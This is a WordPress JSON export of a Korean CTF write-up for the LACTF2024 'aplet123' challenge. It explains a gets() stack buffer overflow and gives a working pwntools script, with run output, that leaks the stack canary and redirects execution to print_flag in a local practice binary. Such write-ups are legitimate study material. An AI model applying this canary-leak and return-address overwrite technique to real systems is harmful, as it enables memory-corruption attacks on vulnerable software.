{"id":3340,"date":"2025-04-14T19:48:09","date_gmt":"2025-04-14T10:48:09","guid":{"rendered":"https:\/\/h4ck.kr\/?p=3340"},"modified":"2025-04-14T19:48:11","modified_gmt":"2025-04-14T10:48:11","slug":"lactf2024-aplet123","status":"publish","type":"post","link":"https:\/\/h4ck.kr\/?p=3340","title":{"rendered":"[LACTF2024] aplet123"},"content":{"rendered":"\n<h3 class=\"wp-block-heading\">checksec<\/h3>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"raw\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">[*] '\/home\/seo\/study\/LACTF2024\/aplet123\/aplet123'\n    Arch:       amd64-64-little\n    RELRO:      Partial RELRO\n    Stack:      Canary found\n    NX:         NX enabled\n    PIE:        No PIE (0x400000)\n    Stripped:   No<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">Decompiled src<\/h3>\n\n\n\n<ul class=\"wp-block-list\">\n<li><code>haystack<\/code> \ubc84\ud37c(\ud06c\uae30 72\ubc14\uc774\ud2b8)\uc5d0 <code>gets<\/code>\ub85c \uc785\ub825\ubc1b\uc74c<\/li>\n\n\n\n<li>\uc785\ub825 \ubb38\uc790\uc5f4\uc5d0 <code>\"i'm\"<\/code>\uc774 \ud3ec\ud568\ub418\uc5b4 \uc788\uc73c\uba74, <code>\"i'm\"<\/code> \ubc14\ub85c \ub4a4\uc758 \ubb38\uc790\uc5f4\uc744 \ucd94\ucd9c\ud574 <code>hi &lt;\uc774\ub984>, i'm aplet123<\/code> \ud615\uc2dd\uc73c\ub85c \ucd9c\ub825\ud568.<\/li>\n\n\n\n<li><code>\"bye\"<\/code>\ub97c \uc785\ub825\ud558\uba74 \uba54\uc778 \ub8e8\ud504 \ube60\uc838\ub098\uac10.<\/li>\n<\/ul>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"c\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">int __fastcall main(int argc, const char **argv, const char **envp)\n{\n  unsigned int v3; \/\/ eax\n  int v5; \/\/ eax\n  char *v6; \/\/ [rsp+8h] [rbp-58h]\n  char haystack[72]; \/\/ [rsp+10h] [rbp-50h] BYREF\n  unsigned __int64 v8; \/\/ [rsp+58h] [rbp-8h]\n\n  v8 = __readfsqword(0x28u);\n  setbuf(_bss_start, 0);\n  v3 = time(0);\n  srand(v3);\n  puts(\"hello\");\n  while ( 1 )\n  {\n    while ( 1 )\n    {\n      while ( 1 )\n      {\n        gets(haystack);\n        v6 = strstr(haystack, \"i'm\");\n        if ( !v6 )\n          break;\n        printf(\"hi %s, i'm aplet123\\n\", v6 + 4);\n      }\n      if ( strcmp(haystack, \"please give me the flag\") )\n        break;\n      puts(\"i'll consider it\");\n      sleep(5u);\n      puts(\"no\");\n    }\n    if ( !strcmp(haystack, \"bye\") )\n      break;\n    v5 = rand();\n    puts(responses[v5 % 0x21uLL]);\n  }\n  puts(\"bye\");\n  return 0;\n}<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">Analysis<\/h3>\n\n\n\n<p><code>gets<\/code> \ud568\uc218\ub294 \uc785\ub825\uae38\uc774 \uc81c\ud55c\uc5c6\uc5b4 BOF \ucde8\uc57d\uc810 \ubc1c\uc0dd \uac00\ub2a5. <br>\uc5f0\uc18d\ub41c A 69\ubc14\uc774\ud2b8 + \u201cI\u2019m\u201d \ud398\uc774\ub85c\ub4dc \uad6c\uc131\uc2dc \uce74\ub098\ub9ac \uc720\ucd9c \uac00\ub2a5. <br>\uadf8 \ud6c4, A 72\ubc14\uc774\ud2b8 + \u314b\uce74\ub098\ub9ac 8\ubc14\uc774\ud2b8 + print_flag \uc8fc\uc18c \ub123\uace0, \ub8e8\ud504\ubb38 \ud0c8\ucd9c\uc2dc flag \ud68d\ub4dd \uac00\ub2a5.<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"c\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">unsigned __int64 print_flag()\n{\n  FILE *stream; \/\/ [rsp+8h] [rbp-118h]\n  char s[264]; \/\/ [rsp+10h] [rbp-110h] BYREF\n  unsigned __int64 v3; \/\/ [rsp+118h] [rbp-8h]\n\n  v3 = __readfsqword(0x28u);\n  stream = fopen(\"flag.txt\", \"r\");\n  fgets(s, 256, stream);\n  puts(s);\n  return v3 - __readfsqword(0x28u);\n}<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">solve.py<\/h3>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"python\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">from pwn import *\n# context.log_level = 'debug'\ncontext(arch='amd64', os='linux')\nwarnings.filterwarnings('ignore')\n\np = process(\".\/aplet123\")\ne = ELF('.\/aplet123', checksec=True)\n\npayload = b\"A\"*(72-3) + b\"i'm\"\n\np.sendlineafter(b\"hello\\n\", payload)\np.recvuntil(b\"hi \")\ncanary = p.recv(7).rjust(0x8, b\"\\x00\")\ncanary = u64(canary)\nsuccess(f\"canary: {hex(canary)}\")\n\npayload = b\"A\"*72\npayload += p64(canary)\npayload += b\"B\"*8\npayload += p64(e.symbols[\"print_flag\"])\n\np.sendlineafter(b\"aplet123\\n\", payload)\n\np.sendline(b\"bye\")\n\np.interactive()<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">Result<\/h3>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"raw\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">seo@seo:~\/study\/LACTF2024\/aplet123$ python3 solve.py\n[+] Starting local process '.\/aplet123': pid 5528\n[*] '\/home\/seo\/study\/LACTF2024\/aplet123\/aplet123'\n    Arch:       amd64-64-little\n    RELRO:      Partial RELRO\n    Stack:      Canary found\n    NX:         NX enabled\n    PIE:        No PIE (0x400000)\n    Stripped:   No\n[+] canary: 0x38089fcbde44af00\n[*] Switching to interactive mode\nunlucky\nbye\nflag{fake_flag}\n\n[*] Got EOF while reading in interactive\n$\n[*] Interrupted\n[*] Process '.\/aplet123' stopped with exit code -11 (SIGSEGV) (pid 5528)\nseo@seo:~\/study\/LACTF2024\/aplet123$ cat flag.txt\nflag{fake_flag}<\/pre>\n","protected":false},"excerpt":{"rendered":"<p>checksec Decompiled src Analysis gets \ud568\uc218\ub294 \uc785\ub825\uae38\uc774 \uc81c\ud55c\uc5c6\uc5b4 BOF \ucde8\uc57d\uc810 \ubc1c\uc0dd \uac00\ub2a5. \uc5f0\uc18d\ub41c A 69\ubc14\uc774\ud2b8 + \u201cI\u2019m\u201d \ud398\uc774\ub85c\ub4dc \uad6c\uc131\uc2dc \uce74\ub098\ub9ac \uc720\ucd9c \uac00\ub2a5. \uadf8 \ud6c4, A 72\ubc14\uc774\ud2b8 + \u314b\uce74\ub098\ub9ac 8\ubc14\uc774\ud2b8 +&hellip;&nbsp;<a href=\"https:\/\/h4ck.kr\/?p=3340\" rel=\"bookmark\">\ub354 \ubcf4\uae30 &raquo;<span class=\"screen-reader-text\">[LACTF2024] aplet123<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"neve_meta_sidebar":"","neve_meta_container":"","neve_meta_enable_content_width":"","neve_meta_content_width":0,"neve_meta_title_alignment":"","neve_meta_author_avatar":"","neve_post_elements_order":"","neve_meta_disable_header":"","neve_meta_disable_footer":"","neve_meta_disable_title":"","_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[19],"tags":[25],"class_list":["post-3340","post","type-post","status-publish","format-standard","hentry","category-ctf-private","tag-pwnable"],"jetpack_featured_media_url":"","jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/3340","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3340"}],"version-history":[{"count":1,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/3340\/revisions"}],"predecessor-version":[{"id":3341,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/3340\/revisions\/3341"}],"wp:attachment":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3340"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3340"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3340"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}